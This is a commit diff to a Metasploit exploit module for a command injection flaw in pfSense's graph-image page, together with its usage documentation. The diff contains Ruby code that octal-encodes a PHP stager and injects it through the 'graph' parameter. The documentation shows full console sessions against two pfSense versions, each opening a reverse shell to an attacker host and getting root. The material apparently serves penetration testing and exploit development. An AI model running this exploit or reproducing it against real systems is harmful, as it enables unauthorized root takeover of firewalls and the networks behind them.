requested changes
parent
bc088cb379
commit
8f0e41e159
|
@ -27,44 +27,22 @@
|
||||||
### pfSense Community Edition 2.2.6-RELEASE
|
### pfSense Community Edition 2.2.6-RELEASE
|
||||||
|
|
||||||
```
|
```
|
||||||
msf exploit(unix/http/pfsense_graph_injection_exec) > options
|
msf exploit(unix/http/pfsense_graph_injection_exec) > use exploit/unix/http/pfsense_graph_injection_execmsf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
|
||||||
|
RHOST => 2.2.2.2
|
||||||
|
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
|
||||||
|
LHOST => 1.1.1.1
|
||||||
|
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
|
||||||
|
|
||||||
Module options (exploit/unix/http/pfsense_graph_injection_exec):
|
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
PASSWORD pfsense yes Password to login with
|
|
||||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
|
||||||
RHOST 192.168.75.132 yes The target address
|
|
||||||
RPORT 443 yes The target port (TCP)
|
|
||||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
|
||||||
USERNAME admin yes User to login with
|
|
||||||
VHOST no HTTP server virtual host
|
|
||||||
|
|
||||||
|
|
||||||
Payload options (php/meterpreter/reverse_tcp):
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST 192.168.75.128 yes The listen address
|
|
||||||
LPORT 80 yes The listen port
|
|
||||||
|
|
||||||
|
|
||||||
Exploit target:
|
|
||||||
|
|
||||||
Id Name
|
|
||||||
-- ----
|
|
||||||
0 Automatic Target
|
|
||||||
|
|
||||||
|
|
||||||
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
|
|
||||||
|
|
||||||
[*] Started reverse TCP handler on 192.168.75.128:80
|
|
||||||
[*] Detected pfSense 2.2.6-RELEASE, uploading intial payload
|
[*] Detected pfSense 2.2.6-RELEASE, uploading intial payload
|
||||||
[*] Triggering the payload, root shell incoming...
|
[*] Payload uploaded successfully, executing
|
||||||
[*] Sending stage (37543 bytes) to 192.168.75.132
|
[*] Sending stage (37543 bytes) to 2.2.2.2
|
||||||
[*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.132:34381) at 2018-01-01 02:07:03 -0600
|
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:42116) at 2018-01-01 17:17:36 -0600
|
||||||
|
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : pfSense.localdomain
|
||||||
|
OS : FreeBSD pfSense.localdomain 10.1-RELEASE-p25 FreeBSD 10.1-RELEASE-p25 #0 c39b63e(releng/10.1)-dirty: Mon Dec 21 15:20:13 CST 2015 root@pfs22-amd64-builder:/usr/obj.RELENG_2_2.amd64/usr/pfSensesrc/src.RELENG_2_2/sys/pfSense_SMP.10 amd64
|
||||||
|
Meterpreter : php/freebsd
|
||||||
meterpreter > getuid
|
meterpreter > getuid
|
||||||
Server username: root (0)
|
Server username: root (0)
|
||||||
meterpreter >
|
meterpreter >
|
||||||
|
@ -73,45 +51,20 @@ meterpreter >
|
||||||
### pfSense Community Edition 2.1.3-RELEASE
|
### pfSense Community Edition 2.1.3-RELEASE
|
||||||
|
|
||||||
```
|
```
|
||||||
msf exploit(unix/http/pfsense_graph_injection_exec) > options
|
msf > use exploit/unix/http/pfsense_graph_injection_exec
|
||||||
|
msf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
|
||||||
Module options (exploit/unix/http/pfsense_graph_injection_exec):
|
RHOST => 2.2.2.2
|
||||||
|
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
|
||||||
Name Current Setting Required Description
|
LHOST => 1.1.1.1
|
||||||
---- --------------- -------- -----------
|
msf exploit(unix/http/pfsense_graph_injection_exec) > set PAYLOAD php/reverse_php
|
||||||
PASSWORD pfsense yes Password to login with
|
PAYLOAD => php/reverse_php
|
||||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
|
||||||
RHOST 192.168.75.131 yes The target address
|
|
||||||
RPORT 443 yes The target port (TCP)
|
|
||||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
|
||||||
USERNAME admin yes User to login with
|
|
||||||
VHOST no HTTP server virtual host
|
|
||||||
|
|
||||||
|
|
||||||
Payload options (php/meterpreter/reverse_tcp):
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST 192.168.75.128 yes The listen address
|
|
||||||
LPORT 80 yes The listen port
|
|
||||||
|
|
||||||
|
|
||||||
Exploit target:
|
|
||||||
|
|
||||||
Id Name
|
|
||||||
-- ----
|
|
||||||
0 Automatic Target
|
|
||||||
|
|
||||||
|
|
||||||
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
|
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
|
||||||
|
|
||||||
[*] Started reverse TCP handler on 192.168.75.128:80
|
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||||||
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
|
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
|
||||||
[*] Triggering the payload, root shell incoming...
|
[*] Payload uploaded successfully, executing
|
||||||
[*] Sending stage (37543 bytes) to 192.168.75.131
|
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:3454) at 2018-01-01 15:49:38 -0600
|
||||||
[*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.131:45257) at 2018-01-01 01:03:05 -0600
|
uname -a
|
||||||
|
|
||||||
meterpreter > getuid
|
FreeBSD pfSense.localdomain 8.3-RELEASE-p16 FreeBSD 8.3-RELEASE-p16 #0: Thu May 1 16:19:14 EDT 2014 root@pf2_1_1_amd64.pfsense.org:/usr/obj.amd64/usr/pfSensesrc/src/sys/pfSense_SMP.8 amd64
|
||||||
Server username: root (0)
|
|
||||||
meterpreter >
|
|
||||||
```
|
```
|
||||||
|
|
|
@ -40,7 +40,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Encoder' => 'php/base64',
|
'Encoder' => 'php/base64',
|
||||||
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
|
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
|
||||||
},
|
},
|
||||||
|
|
||||||
'DisclosureDate' => 'Apr 18, 2016',
|
'DisclosureDate' => 'Apr 18, 2016',
|
||||||
'Platform' => 'php',
|
'Platform' => 'php',
|
||||||
'Arch' => ARCH_PHP,
|
'Arch' => ARCH_PHP,
|
||||||
|
@ -108,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
# If the device isn't fully setup, you get stuck at redirects to wizard.php
|
# If the device isn't fully setup, you get stuck at redirects to wizard.php
|
||||||
# however, this does NOT stop exploitation strangely
|
# however, this does NOT stop exploitation strangely
|
||||||
print_error("pfSense version not detected or wizard still enabled.")
|
print_error('pfSense version not detected or wizard still enabled.')
|
||||||
Gem::Version.new('0.0')
|
Gem::Version.new('0.0')
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -116,10 +115,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
begin
|
begin
|
||||||
cookie = login
|
cookie = login
|
||||||
version = detect_version(cookie)
|
version = detect_version(cookie)
|
||||||
filename = rand_text_alpha(rand(20))
|
filename = rand_text_alpha(rand(10))
|
||||||
|
|
||||||
# generate the PHP meterpreter payload
|
# generate the PHP meterpreter payload
|
||||||
stager = "echo \'<?php "
|
stager = 'echo \'<?php '
|
||||||
stager << payload.encode
|
stager << payload.encode
|
||||||
stager << "?>\' > #{filename}"
|
stager << "?>\' > #{filename}"
|
||||||
# here we begin the encoding process to
|
# here we begin the encoding process to
|
||||||
|
@ -127,25 +126,16 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
# don't look
|
# don't look
|
||||||
complete_stage = ""
|
complete_stage = ""
|
||||||
for i in 0..(stager.length()-1)
|
for i in 0..(stager.length()-1)
|
||||||
if "#{version}" =~ /2.2/
|
if version.to_s =~ /2.2/
|
||||||
complete_stage << "\\\\#{stager[i].ord.to_s(8)}"
|
complete_stage << '\\'
|
||||||
else
|
|
||||||
complete_stage << "\\#{stager[i].ord.to_s(8)}"
|
|
||||||
end
|
end
|
||||||
|
complete_stage << "\\#{stager[i].ord.to_s(8)}"
|
||||||
end
|
end
|
||||||
|
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
'uri' => '/status_rrd_graph_img.php',
|
'uri' => '/status_rrd_graph_img.php',
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'headers' => {
|
'cookie' => cookie,
|
||||||
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
|
|
||||||
'Accept' => '*/*',
|
|
||||||
'Accept-Language' => 'en-US,en;q=0.5',
|
|
||||||
'Accept-Encoding' => 'gzip, deflate',
|
|
||||||
'Origin' => 'null',
|
|
||||||
'Cookie' => cookie,
|
|
||||||
'Connection' => 'close',
|
|
||||||
},
|
|
||||||
'vars_get' => {
|
'vars_get' => {
|
||||||
'database' => '-throughput.rrd',
|
'database' => '-throughput.rrd',
|
||||||
'graph' => "file|printf '#{complete_stage}'|sh|echo",
|
'graph' => "file|printf '#{complete_stage}'|sh|echo",
|
||||||
|
@ -153,23 +143,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
)
|
)
|
||||||
|
|
||||||
if res && res.code == 200
|
if res && res.code == 200
|
||||||
print_status("Triggering the payload, root shell incoming...")
|
print_status('Payload uploaded successfully, executing')
|
||||||
else
|
else
|
||||||
print_error("Failed to upload the initial payload...")
|
print_error('Failed to upload payload...')
|
||||||
end
|
end
|
||||||
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => '/status_rrd_graph_img.php',
|
'uri' => '/status_rrd_graph_img.php',
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'headers' => {
|
'cookie' => cookie,
|
||||||
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
|
|
||||||
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
|
||||||
'Accept-Language' => 'en-US,en;q=0.5',
|
|
||||||
'Accept-Encoding' => 'gzip, deflate',
|
|
||||||
'Cookie' => cookie,
|
|
||||||
'Connection' => 'close',
|
|
||||||
'Upgrade-Insecure-Requests' => '1',
|
|
||||||
},
|
|
||||||
'vars_get' => {
|
'vars_get' => {
|
||||||
'database' => '-throughput.rrd',
|
'database' => '-throughput.rrd',
|
||||||
'graph' => "file|php #{filename}|echo "
|
'graph' => "file|php #{filename}|echo "
|
||||||
|
|
Loading…
Reference in New Issue